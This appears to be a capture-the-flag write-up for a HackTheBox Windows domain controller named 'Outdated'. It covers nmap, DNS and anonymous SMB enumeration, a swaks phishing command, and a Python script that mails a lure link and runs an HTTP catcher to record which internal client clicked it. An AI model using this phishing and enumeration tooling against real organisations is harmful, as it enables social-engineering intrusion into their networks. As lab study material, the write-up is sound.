Outdated
Tools
nmap
Command: nmap -Pn -sC -sV -oN init-nmap.out outdated.htb
Note: the port set (53, 88, 389/636, 3268/3269, 445, 464) marks this host as the domain controller for outdated.htb (DC.outdated.htb), with hMailServer on 25. The ~12h clock skew reported below matters later: Kerberos rejects requests more than 5 minutes off the KDC clock, so sync time (e.g. ntpdate against the DC, or faketime) before any Kerberos-based tooling.
# Nmap 7.92 scan initiated Sat Aug 13 14:02:56 2022 as: nmap -Pn -sC -sV -oN init-nmap.out outdated.htb
Nmap scan report for outdated.htb (10.129.188.41)
Host is up (0.053s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-14 07:03:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after: 2024-06-18T06:00:24
|_ssl-date: 2022-08-14T07:04:38+00:00; +12h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-14T07:04:38+00:00; +12h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after: 2024-06-18T06:00:24
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-14T07:04:39+00:00; +12h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after: 2024-06-18T06:00:24
3269/tcp open globalcatLDAPssl?
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after: 2024-06-18T06:00:24
|_ssl-date: 2022-08-14T07:04:38+00:00; +12h00m00s from scanner time.
Service Info: Hosts: mail.outdated.htb, DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 11h59m59s, deviation: 0s, median: 11h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 13 14:04:39 2022 -- 1 IP address (1 host up) scanned in 103.45 seconds
dig
Command: dig @10.129.188.41 outdated.htb
Result: two A records; the second, 172.16.20.1, sits on a different network (172.16.20.0/24) than the scan target, i.e. an internal segment behind the DC (these notes assume a Docker container with a custom IP)
$ dig @10.129.188.41 outdated.htb
; <<>> DiG 9.16.27-Debian <<>> @10.129.188.41 outdated.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 13223
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;outdated.htb. IN A
;; ANSWER SECTION:
outdated.htb. 600 IN A 172.16.20.1
outdated.htb. 600 IN A 10.129.188.41
;; Query time: 53 msec
;; SERVER: 10.129.188.41#53(10.129.188.41)
;; WHEN: Sat Aug 13 14:12:01 CDT 2022
;; MSG SIZE rcvd: 73
fierce
Command: fierce --domain outdated.htb --dns-servers 10.129.188.41
Found 3 hostnames: client and dc resolve into the internal 172.16.20.0/24 range, mail resolves to the scan target 10.129.188.41 (no zone transfer, no wildcard)
$ fierce --domain outdated.htb --dns-servers 10.129.188.41
NS: dc.outdated.htb.
SOA: dc.outdated.htb. (10.129.188.41)
Zone: failure
Wildcard: failure
Found: client.outdated.htb. (172.16.20.20)
Found: dc.outdated.htb. (172.16.20.1)
Found: mail.outdated.htb. (10.129.188.41)
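The three recon outputs above (nmap, dig, fierce) are worth triaging in one place: which ports are open, what the AD domain is, whether the box is a DC, how far off its clock is, and which discovered hosts we can actually route to. The script below is an added example, not part of the original notes; it parses a sample constructed from the scan output on this page. The reachable network (10.129.0.0/16) is an assumption about the lab range; the DC port set and the 5-minute Kerberos tolerance are standard.

```python
"""Triage recon output: nmap -oN port lines, AD domain, clock skew, fierce hosts."""
import ipaddress
import re

# Sample text constructed from the nmap output on this page (trimmed).
NMAP_OUT = """\
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-14 07:03:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 11h59m59s, deviation: 0s, median: 11h59m59s
"""

# Sample constructed from the fierce output on this page.
FIERCE_OUT = """\
Found: client.outdated.htb. (172.16.20.20)
Found: dc.outdated.htb. (172.16.20.1)
Found: mail.outdated.htb. (10.129.188.41)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# nmap prints the LDAP domain with a trailing "0." (a stray NUL byte), hence the 0?.
DOMAIN_RE = re.compile(r"Domain: (\S+?)0?\.,")
FOUND_RE = re.compile(r"^Found:\s+(\S+?)\.?\s+\((\S+)\)")
UNIT = {"d": 86400, "h": 3600, "m": 60, "s": 1}
DC_PORTS = {88, 389, 445, 464}  # Kerberos, LDAP, SMB, kpasswd: the DC signature


def parse_ports(text):
    """Return {port: (proto, state, service, version)} from nmap normal output."""
    ports = {}
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            ports[int(port)] = (proto, state, service, version or "")
    return ports


def skew_seconds(text):
    """Signed offset (target minus scanner) from the clock-skew host script, or None."""
    m = re.search(r"clock-skew: mean: (-?[0-9dhms]+)", text)
    if not m:
        return None
    sign = -1 if m.group(1).startswith("-") else 1
    return sign * sum(int(n) * UNIT[u] for n, u in re.findall(r"(\d+)([dhms])", m.group(1)))


def classify_hosts(text, reachable_nets):
    """Split fierce's 'Found:' lines into hosts we can route to and internal-only ones."""
    nets = [ipaddress.ip_network(n) for n in reachable_nets]
    reachable, internal_only = {}, {}
    for line in text.splitlines():
        m = FOUND_RE.match(line.strip())
        if not m:
            continue
        host, addr = m.group(1), ipaddress.ip_address(m.group(2))
        (reachable if any(addr in n for n in nets) else internal_only)[host] = str(addr)
    return reachable, internal_only


def triage(nmap_text, fierce_text, reachable_nets):
    """Summarise the recon: open ports, domain, DC role, clock skew, host reachability."""
    ports = parse_ports(nmap_text)
    dom = DOMAIN_RE.search(nmap_text)
    skew = skew_seconds(nmap_text)
    reachable, internal_only = classify_hosts(fierce_text, reachable_nets)
    return {
        "open_ports": sorted(p for p, v in ports.items() if v[1] == "open"),
        "domain": dom.group(1) if dom else None,
        "looks_like_dc": DC_PORTS <= set(ports),
        "clock_skew_s": skew,
        # Kerberos rejects requests more than 5 minutes off the KDC clock.
        "needs_time_sync": skew is not None and abs(skew) > 300,
        "reachable_hosts": reachable,
        "internal_only_hosts": internal_only,
    }


if __name__ == "__main__":
    for k, v in triage(NMAP_OUT, FIERCE_OUT, ["10.129.0.0/16"]).items():
        print(f"{k}: {v}")
```

On this box the summary flags a DC for outdated.htb, a 43199 s (11h59m59s) skew that must be fixed before Kerberos tooling, and two hosts (client, dc) that only exist on the 172.16.20.0/24 side, so the mail host is the only one we can touch directly.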
smbclient
Command: smbclient -U '' -L //outdated.htb
Result: an anonymous (null) session lists the available shares

Command: smbclient --no-pass //outdated.htb/Shares
Result: connected to the Shares share anonymously and was able to download a file

Finding this in the public Shares folder tells us what they're trying to patch.
swaks
SMTP phishing: the mail server accepts unauthenticated mail for its own domain, so we can deliver a lure to itsupport
perl swaks.pl --to itsupport@outdated.htb --from me@example.com --server mail.outdated.htb --body "http://10.10.14.73/rce"
Result: the link is clicked; the request for /rce arrives at our listener on 10.10.14.73
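The swaks line only covers the sending half; to know the lure was clicked (and by what client) you also need something listening on 10.10.14.73. The script below is an added example, not code from the original notes: it builds and sends the same message (unauthenticated SMTP to the target's mail server, as swaks does) and runs a small HTTP catcher that records client IP, path and User-Agent for every hit. The subject line and the listener port are assumptions; the addresses and URL are the ones from the command above.

```python
"""Lure mail plus click-catcher for the swaks step (added example, assumptions noted)."""
import smtplib
import threading
from email.message import EmailMessage
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen


def build_lure(to_addr, from_addr, url, subject="Update available"):
    """Same message swaks builds from --to/--from/--body, plus an explicit Subject (assumed text)."""
    msg = EmailMessage()
    msg["From"] = from_addr
    msg["To"] = to_addr
    msg["Subject"] = subject
    msg.set_content(f"Please open {url}\n")
    return msg


def send_lure(msg, server="mail.outdated.htb", port=25):
    """Plain, unauthenticated SMTP delivery, as in the swaks line (needs a route to the target)."""
    with smtplib.SMTP(server, port, timeout=15) as smtp:
        smtp.send_message(msg)


class ClickCatcher(BaseHTTPRequestHandler):
    """Records who fetched what; the hits list is the proof that the lure was clicked."""
    hits = []  # (client_ip, path, user_agent)

    def do_GET(self):
        ClickCatcher.hits.append((self.client_address[0], self.path, self.headers.get("User-Agent", "")))
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok\n")

    def log_message(self, format, *args):
        pass  # hits[] is the record; keep the console quiet


def start_catcher(bind="0.0.0.0", port=80):
    """Serve in a background thread; returns the server so the caller can read its port and stop it."""
    srv = HTTPServer((bind, port), ClickCatcher)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def simulate_click(srv, path="/rce"):
    """Local self-test: hit our own catcher over loopback and return the recorded entry."""
    port = srv.server_address[1]
    with urlopen(f"http://127.0.0.1:{port}{path}", timeout=5) as resp:
        resp.read()
    return ClickCatcher.hits[-1]


if __name__ == "__main__":
    catcher = start_catcher()  # port 80 (assumed): run as root or pick a high port and adjust the URL
    send_lure(build_lure("itsupport@outdated.htb", "me@example.com", "http://10.10.14.73/rce"))
    input("waiting for clicks, press Enter to stop\n")
    for ip, path, ua in ClickCatcher.hits:
        print(ip, path, ua)
    catcher.shutdown()
```

The User-Agent of the hit is the useful bit: it tells you which client on the internal segment opened the link and what it is running, which decides what to put behind /rce next.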

metasploit
Found helpful msf article https://medium.com/hacker-toolbelt/metasploitable-2-i-lab-setup-8cd4472d7958